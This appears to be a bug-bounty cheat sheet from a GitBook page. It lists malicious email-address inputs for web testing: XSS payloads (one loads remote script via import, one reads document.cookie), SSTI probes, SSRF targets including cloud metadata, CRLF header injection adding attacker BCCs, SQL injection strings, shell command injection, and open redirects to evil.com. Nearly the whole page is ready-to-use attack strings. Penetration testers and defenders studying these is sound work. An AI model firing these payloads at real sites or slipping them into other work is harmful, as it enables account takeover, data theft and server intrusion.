Email injections

Emails injection: XSS, SQLi, SSTI, etc.

user[email][]=valid@email.com&user[email][]=attacker@email.com

Punnycode

Check Email Registration

Registration Form

Parser Abuse - Domain confusion

oastify.com!collab\@example.com
collab%psres.net(@example.com

XSS

"><script>alert(1)</script>@test.com
"><svg/onload=alert(3)>@test.com
"><svg/onload=confirm(1337)>"@x.y
"<script src=//xsshere?"@email.com
"><Img/Src/OnError=alert(1)>"@gmail.com
"><Img/Src/OnError=import('//X55.is')>"@gmail.com
"><Svg/OnLoad=alert(1)>"@gmail.com
"><svg/onload=confirm(1)>"@x.y
test+(<script>alert(0)</script>)@example.com
attacker@gmail.com'\"<svg/onload=alert(document.cookie)>

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

"><img/src/onerror=import('//domain/')>"@yourdomain.com

XSS

SSTI

test+${{7*7}}@example.com

test+(${{7*7}})@example.com

test-(${{7*7}})@example.com

SSRF

test@your-burpcollaborator.net
test@requestbin.net
test@127.0.0.1
test@localhost
test@169.254.169.254

CRLF

CRLF InjectionPassword Reset

Register or reset password

test@example.com%0d%0aBCC:attacker@example.com
test@example.com\r\nBCC:attacker@example.com
test@example.com%0aCC:attacker@example.com
test@example.com\r\nContent-Type:text/html\r\n\r\n<b>Injected</b>
test@example.com%0d%0aInjected-Header: injected
test@example.com%0aInjected-Header: injected

SQL Injection

SQL Injection
test' OR '1'='1@example.com
test" OR "1"="1@example.com
test@example.com'--
test@example.com") OR 1=1--
"1-'or'1'='1"@email.com
john.doe+intigriti' or/**/1/**/=/**/--@example.com
johne.doe+intigriti'/**/or/**/1/**/=/**/1/**/--@example.com
test+intigiriti'/**/union/**/select/**/table_name/**/from/**/information_schema.tables--@test.test

Command Injection

Command Injection
test@example.com; whoami
test@example.com && id
test@example.com | uname -a
test@example.com`id`

Open Redirection

test@example.com%0d%0aLocation:https://evil.com
test@example.com/?next=https://evil.com

Bypass Access Control

HTML injection - Subscription form

Resources

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Last updated